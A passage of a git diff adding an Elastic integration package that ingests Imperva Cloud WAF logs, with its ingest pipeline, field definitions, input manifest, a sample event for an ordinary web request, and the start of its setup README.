{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.tag + tag: rename_extensions_tag + target_field: imperva_cloud_waf.event.extensions.tag + ignore_missing: true + - rename: + field: cef.extensions.ver + tag: rename_extensions_ver + target_field: imperva_cloud_waf.event.extensions.ver + ignore_missing: true + - grok: + field: imperva_cloud_waf.event.extensions.ver + tag: grok_to_extract_tls_cipher_and_version + ignore_missing: true + patterns: + - ^(TLSv%{GREEDYDATA:tls.version} %{GREEDYDATA:tls.cipher})$ + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: cef.extensions.xff + tag: convert_extensions_xff_to_ip + target_field: imperva_cloud_waf.event.extensions.xff + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.xff != null && ctx.cef.extensions.xff != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: network.forwarded_ip + tag: set_network_forwarded_ip_from_event_extensions_xff + copy_from: imperva_cloud_waf.event.extensions.xff + ignore_empty_value: true + - append: + field: related.ip + tag: append_network_forwarded_ip_into_related_ip + value: '{{{network.forwarded_ip}}}' + allow_duplicates: false + if: ctx.network?.forwarded_ip != null + - rename: + field: cef.name + tag: rename_name + target_field: imperva_cloud_waf.event.name + ignore_missing: true + - convert: + field: cef.severity + tag: convert_severity_to_long + target_field: imperva_cloud_waf.event.severity + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.version + tag: rename_version + target_field: imperva_cloud_waf.event.version + ignore_missing: true + - remove: + field: + - imperva_cloud_waf.event.device.event_class_id + - imperva_cloud_waf.event.device.product + - imperva_cloud_waf.event.device.vendor + - imperva_cloud_waf.event.device.version + - imperva_cloud_waf.event.extensions.action + - imperva_cloud_waf.event.extensions.application_protocol + - imperva_cloud_waf.event.extensions.bytes_in + - imperva_cloud_waf.event.extensions.ccode + - imperva_cloud_waf.event.extensions.cpt + - imperva_cloud_waf.event.extensions.cs9 + - imperva_cloud_waf.event.extensions.device.custom_number1 + - imperva_cloud_waf.event.extensions.end_time + - imperva_cloud_waf.event.extensions.file_id + - imperva_cloud_waf.event.extensions.postbody + - imperva_cloud_waf.event.extensions.qstr + - imperva_cloud_waf.event.extensions.request.client_application + - imperva_cloud_waf.event.extensions.request.method + - imperva_cloud_waf.event.extensions.request.url + - imperva_cloud_waf.event.extensions.sip + - imperva_cloud_waf.event.extensions.source.address + - imperva_cloud_waf.event.extensions.source.port + - imperva_cloud_waf.event.extensions.source.user_id + - imperva_cloud_waf.event.extensions.start_time + - imperva_cloud_waf.event.extensions.xff + - imperva_cloud_waf.event.severity + - imperva_cloud_waf.event.extensions.cs7 + - imperva_cloud_waf.event.extensions.cs8 + - imperva_cloud_waf.event.extensions.file.permission + - imperva_cloud_waf.event.extensions.file.type + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + - remove: + field: cef + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/base-fields.yml b/packages/imperva_cloud_waf/data_stream/event/fields/base-fields.yml new file mode 100644 index 00000000000..e0aeb47a9ff --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: imperva_cloud_waf +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: imperva_cloud_waf.event +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/beats.yml b/packages/imperva_cloud_waf/data_stream/event/fields/beats.yml new file mode 100644 index 00000000000..083dcfe307e --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/fields/beats.yml @@ -0,0 +1,27 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. +- name: aws.s3 + type: group + fields: + - name: bucket + type: group + fields: + - name: name + type: keyword + description: The AWS S3 bucket name. + - name: arn + type: keyword + description: The AWS S3 bucket ARN. + - name: object + type: group + fields: + - name: key + type: keyword + description: The AWS S3 Object key. diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/ecs.yml b/packages/imperva_cloud_waf/data_stream/event/fields/ecs.yml new file mode 100644 index 00000000000..23390b8a250 --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/fields/ecs.yml @@ -0,0 +1,16 @@ +- name: destination + type: group + fields: + - name: process + type: group + fields: + - name: name + type: keyword +- name: source + type: group + fields: + - name: service + type: group + fields: + - name: name + type: keyword diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/fields.yml b/packages/imperva_cloud_waf/data_stream/event/fields/fields.yml new file mode 100644 index 00000000000..bd7fef416b0 --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/fields/fields.yml @@ -0,0 +1,212 @@ +- name: imperva_cloud_waf + type: group + fields: + - name: event + type: group + fields: + - name: device + type: group + fields: + - name: event_class_id + type: keyword + description: Signature Id. + - name: product + type: keyword + description: The product or service that is generating the logs. + - name: vendor + type: keyword + description: The vendor that is generating the logs. + - name: version + type: keyword + description: An integer that identifies the version of the log format. + - name: extensions + type: group + fields: + - name: action + type: keyword + description: The method in which Imperva processed the request. + - name: additional + type: group + fields: + - name: req_headers + type: object + object_type: keyword + description: Request headers in JSON format, with each field represented as a name-value pair. + - name: res_headers + type: object + object_type: keyword + description: Response headers in JSON format, with each field represented as a name-value pair. + - name: application_protocol + type: keyword + description: The request protocol. + - name: bytes_in + type: long + description: The content length. + - name: ccode + type: keyword + description: The country code of the site visitor. + - name: cicode + type: keyword + description: The city code of the site visitor. + - name: cpt + type: long + description: The client port used to communicate the request. + - name: cs10 + type: object + object_type: keyword + description: JSON describing all actions that were applied to a specific request. + - name: cs10Label + type: keyword + - name: cs11 + type: object + object_type: keyword + description: Additional information on the violation that triggered the rule, in JSON format. + - name: cs11Label + type: keyword + - name: cs7 + type: double + description: The latitude of the event. + - name: cs7Label + type: keyword + - name: cs8 + type: double + description: The longitude of the event. + - name: cs8Label + type: keyword + - name: cs9 + type: keyword + description: The threat rule name that this request triggered. + - name: cs9Label + type: keyword + - name: customer + type: keyword + description: The account name of the site owner. + - name: destination_process_name + type: keyword + description: The browser type. + - name: device + type: group + fields: + - name: custom_number1 + type: long + description: The HTTP response code returned to the client. + - name: custom_string1 + type: keyword + description: Whether or not the client application supports Captcha. + - name: custom_string1_label + type: keyword + - name: custom_string2 + type: boolean + description: Whether or not the client application supports JavaScript. + - name: custom_string2_label + type: keyword + - name: custom_string3 + type: boolean + description: Whether or not the client application supports cookies. + - name: custom_string3_label + type: keyword + - name: custom_string4 + type: keyword + description: The ID of the visitor. + - name: custom_string4_label + type: keyword + - name: custom_string5 + type: keyword + description: For internal use. + - name: custom_string5_label + type: keyword + - name: custom_string6 + type: keyword + description: The client application software. + - name: custom_string6_label + type: keyword + - name: externalId + type: keyword + description: A unique identifier of the request that can be used to correlate with reports and data from the Imperva Cloud Security Console. + - name: facility + type: keyword + description: The Imperva PoP that handled the request. + - name: end_time + type: date + description: The end time of the response to the request, in UTC. In UNIX epoch time format. + - name: file + type: group + fields: + - name: permission + type: keyword + description: Imperva attack id. + - name: type + type: keyword + description: The type of attack. + - name: file_id + type: keyword + description: The unique identification. + - name: postbody + type: keyword + description: The post body data of the request. + - name: qstr + type: keyword + description: The query string of the request. + - name: ref + type: keyword + description: The URL of the previous page that the client visited. + - name: request + type: group + fields: + - name: client_application + type: keyword + description: The UserAgent header value. + - name: method + type: keyword + description: The request method. + - name: url + type: keyword + description: The URL of the request. + - name: sip + type: ip + description: The IP address of the server. + - name: site + type: group + fields: + - name: id + type: keyword + description: The numeric identifier of the site. + - name: tag + type: keyword + description: Site level reference ID. + - name: source + type: group + fields: + - name: address + type: ip + description: The client IP that made the request. + - name: port + type: long + description: The port of the server. + - name: service_name + type: keyword + description: The name of the site. + - name: user_id + type: keyword + description: The numeric identifier of the account of the site owner. + - name: start_time + type: date + description: The time in which this visit started, in UTC. In UNIX epoch time format. + - name: tag + type: keyword + description: Account level reference ID. + - name: ver + type: keyword + description: The TLS version and encryption algorithms used in the request. + - name: xff + type: ip + description: The X-Forwarded-For request header. + - name: name + type: keyword + description: The rule type that was triggered. + - name: severity + type: long + description: Imperva internal rule ID number. + - name: version + type: keyword + description: An integer that identifies the version of the log format. diff --git a/packages/imperva_cloud_waf/data_stream/event/manifest.yml b/packages/imperva_cloud_waf/data_stream/event/manifest.yml new file mode 100644 index 00000000000..801b8bb8323 --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/manifest.yml @@ -0,0 +1,340 @@ +title: Collect Imperva Cloud WAF Events +type: logs +streams: + - input: cel + title: Event logs + description: Collect Event logs from Imperva Cloud WAF. + template_path: cel.yml.hbs + enabled: false + vars: + - name: api_id + type: password + title: API ID + description: API ID for the Imperva Cloud WAF. + multi: false + required: true + show_user: true + secret: true + - name: api_key + type: password + title: API Key + description: API Key for the Imperva Cloud WAF. + multi: false + required: true + show_user: true + secret: true + - name: url + type: text + title: URL + description: Base URL of the Imperva Cloud WAF API. + required: true + - name: interval + type: text + title: Interval + description: Duration between requests to the Events API. Supported units for this parameter are h/m/s. + default: 1m + multi: false + required: true + show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_request_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - imperva_cloud_waf-event + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve imperva_cloud_waf.event fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + - input: aws-s3 + title: Imperva Cloud WAF Events + description: Collect Imperva Cloud WAF Events via AWS S3 input. + template_path: aws-s3.yml.hbs + enabled: false + vars: + - name: collect_s3_logs + required: true + show_user: true + title: Collect logs via S3 Bucket + description: To Collect logs via S3 bucket enable the toggle switch. By default, it will collect logs via SQS Queue. + type: bool + multi: false + default: false + - name: access_key_id + type: password + title: Access Key ID + multi: false + required: false + show_user: true + description: First part of access key. + secret: true + - name: secret_access_key + type: password + title: Secret Access Key + multi: false + required: false + show_user: true + description: Second part of access key. + secret: true + - name: session_token + type: text + title: Session Token + multi: false + required: false + show_user: true + description: Required when using temporary security credentials. + secret: false + - name: bucket_arn + type: text + title: "[S3] Bucket ARN" + multi: false + required: false + show_user: true + description: ARN of the AWS S3 bucket that will be polled for list operation. It is a required parameter for collecting logs via the AWS S3 Bucket. + - name: bucket_list_prefix + type: text + title: "[S3] Bucket Prefix" + multi: false + required: false + show_user: true + description: Prefix to apply for the list request to the S3 bucket. + - name: interval + type: text + title: "[S3] Interval" + multi: false + required: false + show_user: true + default: 6m + description: Time interval for polling listing of the S3 bucket. It should be greater than 5m. Supported units are h/m/s. + - name: number_of_workers + type: integer + title: "[S3] Number of Workers" + multi: false + required: false + show_user: true + default: 5 + description: Number of workers that will process the S3 objects listed. It is a required parameter for collecting logs via the AWS S3 Bucket. + - name: queue_url + type: text + title: "[SQS] Queue URL" + multi: false + required: false + show_user: true + description: URL of the AWS SQS queue that messages will be received from. It is a required parameter for collecting logs via the AWS SQS. + - name: visibility_timeout + type: text + title: "[SQS] Visibility Timeout" + multi: false + required: false + show_user: true + default: 300s + description: The duration that the received messages are hidden from subsequent retrieve requests after being retrieved by a ReceiveMessage request. The maximum is 12 hours. Supported units for this parameter are h/m/s. + - name: api_timeout + type: text + title: "[SQS] API Timeout" + multi: false + required: false + show_user: true + default: 120s + description: The maximum duration of AWS API can take. The maximum is half of the visibility timeout value. Supported units for this parameter are h/m/s. + - name: max_number_of_messages + type: integer + title: "[SQS] Maximum Concurrent SQS Messages" + required: false + show_user: true + default: 5 + description: The maximum number of SQS messages that can be inflight at any time. + - name: file_selectors + type: yaml + title: "[SQS] File Selectors" + multi: false + required: false + show_user: false + description: If the SQS queue will have events that correspond to files that this integration shouldn't process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + - name: region + type: text + title: "[SQS] Region" + multi: false + required: false + show_user: true + description: The name of the AWS region of the end point. If this option is given it takes precedence over the region name obtained from the queue_url value. + - name: fips_enabled + type: bool + title: Enable S3 FIPS + default: false + multi: false + required: false + show_user: false + description: Enabling this option changes the service name from `s3` to `s3-fips` for connecting to the correct service endpoint. + - name: shared_credential_file + type: text + title: Shared Credential File + multi: false + required: false + show_user: false + description: Directory of the shared credentials file + - name: credential_profile_name + type: text + title: Credential Profile Name + multi: false + required: false + show_user: false + description: Profile name in shared credentials file. + - name: role_arn + type: text + title: Role ARN + multi: false + required: false + show_user: false + description: AWS IAM Role to assume. + - name: default_region + type: text + title: Default AWS Region + multi: false + required: false + show_user: false + default: "" + description: Default region to use prior to connecting to region specific services/endpoints if no AWS region is set from environment variable, credentials or instance profile. If none of the above are set and no default region is set as well, `us-east-1` is used. A region, either from environment variable, credentials or instance profile or from this default region setting, needs to be set when using regions in non-regular AWS environments such as AWS China or US Government Isolated. + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - imperva_cloud_waf-event + - name: preserve_original_event + required: false + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: false + show_user: false + title: Preserve duplicate custom fields + description: Preserve ocsf fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- diff --git a/packages/imperva_cloud_waf/data_stream/event/sample_event.json b/packages/imperva_cloud_waf/data_stream/event/sample_event.json new file mode 100644 index 00000000000..e2ef0c7dcce --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/sample_event.json @@ -0,0 +1,180 @@ +{ + "@timestamp": "2024-01-31T09:22:42.456Z", + "agent": { + "ephemeral_id": "7d22d234-404b-426a-be1c-8ca128c3357b", + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.10.1" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-imperva-cloud-waf-bucket-13510", + "name": "elastic-package-imperva-cloud-waf-bucket-13510" + }, + "object": { + "key": "events.log" + } + } + }, + "cloud": { + "region": "us-east-1" + }, + "data_stream": { + "dataset": "imperva_cloud_waf.event", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "snapshot": false, + "version": "8.10.1" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web" + ], + "code": "1", + "dataset": "imperva_cloud_waf.event", + "end": "2019-08-20T11:31:10.892Z", + "ingested": "2024-01-31T09:22:43Z", + "kind": "event", + "original": "CEF:0|Incapsula|SIEMintegration|1|1|Normal|0| sourceServiceName=site123.abcd.info siteid=1509732 suid=50005477 requestClientApplication=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 deviceFacility=mia ccode=IL tag=www.elvis.com cicode=Rehovot cs7=31.8969 cs7Label=latitude cs8=34.8186 cs8Label=longitude Customer=CEFcustomer123 siteTag=my-site-tag start=1453290121336 request=site123.abcd.info/main.css ref=www.incapsula.com/lama requestmethod=GET cn1=200 app=HTTP deviceExternalID=33411452762204224 in=54 xff=44.44.44.44 cpt=443 src=12.12.12.12 ver=TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 end=1566300670892 additionalReqHeaders=[{\"Accept\":\"*/*\"},{\"x-v\":\"1\"},{\"x-fapi-interaction-id\":\"10.10.10.10\"}] additionalResHeaders=[{\"Content-Type\":\"text/html; charset\\=UTF-8\"}]", + "severity": 0, + "start": "2016-01-20T11:42:01.336Z", + "type": [ + "info" + ] + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "imperva_cloud_waf": { + "event": { + "extensions": { + "additional": { + "req_headers": [ + { + "Accept": "*/*" + }, + { + "x-v": "1" + }, + { + "x-fapi-interaction-id": "10.10.10.10" + } + ], + "res_headers": [ + { + "Content-Type": "text/html; charset=UTF-8" + } + ] + }, + "cicode": "Rehovot", + "cs7Label": "latitude", + "cs8Label": "longitude", + "customer": "CEFcustomer123", + "device": { + "externalId": "33411452762204224", + "facility": "mia" + }, + "ref": "www.incapsula.com/lama", + "site": { + "id": "1509732", + "tag": "my-site-tag" + }, + "source": { + "service_name": "site123.abcd.info" + }, + "tag": "www.elvis.com", + "ver": "TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256" + }, + "name": "Normal", + "version": "0" + } + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-imperva-cloud-waf-bucket-13510.s3.us-east-1.amazonaws.com/events.log" + }, + "offset": 134 + }, + "message": "Normal", + "network": { + "application": "http", + "forwarded_ip": "44.44.44.44" + }, + "observer": { + "product": "SIEMintegration", + "vendor": "Incapsula", + "version": "1" + }, + "related": { + "ip": [ + "12.12.12.12", + "44.44.44.44" + ], + "user": [ + "50005477" + ] + }, + "source": { + "bytes": 54, + "geo": { + "country_iso_code": "IL", + "location": { + "lat": 31.8969, + "lon": 34.8186 + } + }, + "ip": "12.12.12.12", + "port": 443, + "service": { + "name": "site123.abcd.info" + }, + "user": { + "id": "50005477" + } + }, + "tags": [ + "collect_sqs_logs", + "preserve_original_event", + "forwarded", + "imperva_cloud_waf-event" + ], + "tls": { + "cipher": "ECDHE-RSA-AES128-GCM-SHA256", + "version": "1.2" + }, + "url": { + "extension": "css", + "original": "site123.abcd.info/main.css", + "path": "site123.abcd.info/main.css" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Firefox", + "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", + "os": { + "full": "Windows 7", + "name": "Windows", + "version": "7" + }, + "version": "40.0." + } +} \ No newline at end of file diff --git a/packages/imperva_cloud_waf/docs/README.md b/packages/imperva_cloud_waf/docs/README.md new file mode 100644 index 00000000000..7804458cb4b --- /dev/null +++ b/packages/imperva_cloud_waf/docs/README.md @@ -0,0 +1,360 @@ +# Imperva Cloud WAF + +Imperva Cloud WAF is a cloud-based application delivery service that includes web security, DDoS protection, CDN, and load balancing. + +## Data streams + +This integration supports ingestion of events from Imperva Cloud WAF, via AWS S3 input or via [Imperva API](https://docs.imperva.com/bundle/cloud-application-security/page/settings/log-integration.htm). + +**Event** is used to retrieve access and security events. See more details in the documentation [here](https://docs.imperva.com/bundle/cloud-application-security/page/more/log-file-structure.htm). + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.10.1**. + +## Setup + +### Steps to setup Amazon S3 Connection(Push Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Amazon S3**. +4. Next, fill in your credentials: + Your S3 Access key, Secret key, and Path, where path is the location of the folder where you want to store the logs. Enter the path in the following format: /. For example: MyBucket/MyIncapsulaLogFolder. +5. Click Test connection to perform a full testing cycle in which a test file will be transferred to your designated folder. The test file does not contain real data, and will be removed by Incapsula when the transfer is complete. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Steps to obtain API URL, API Key and API ID(Pull Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Imperva API**. +4. From this window copy and keep API Key handy, this will be required for further Integration configuration. +5. Copy **API ID** and **Log Server URI**. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Imperva Cloud WAF +3. Click on the "Imperva Cloud WAF" integration from the search results. +4. Click on the "Add Imperva Cloud WAF" button to add the integration. +5. While adding the integration, if you want to collect logs via AWS S3, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - bucket arn + - collect logs via S3 Bucket toggled on + + or if you want to collect logs via AWS SQS, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - queue url + - collect logs via S3 Bucket toggled off + + or if you want to collect logs via API, keep **Collect Imperva Cloud WAF logs via API** toggle on and and then configure following parameters: + - API ID + - API Key + - URL +6. Save the integration. + +**NOTE**: There are other input combination options available for AWS S3 input, please check [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html). + +## Logs Reference + +### Event + +This is the `Event` dataset. + +#### Example + +An example event for `event` looks as following: + +```json +{ + "@timestamp": 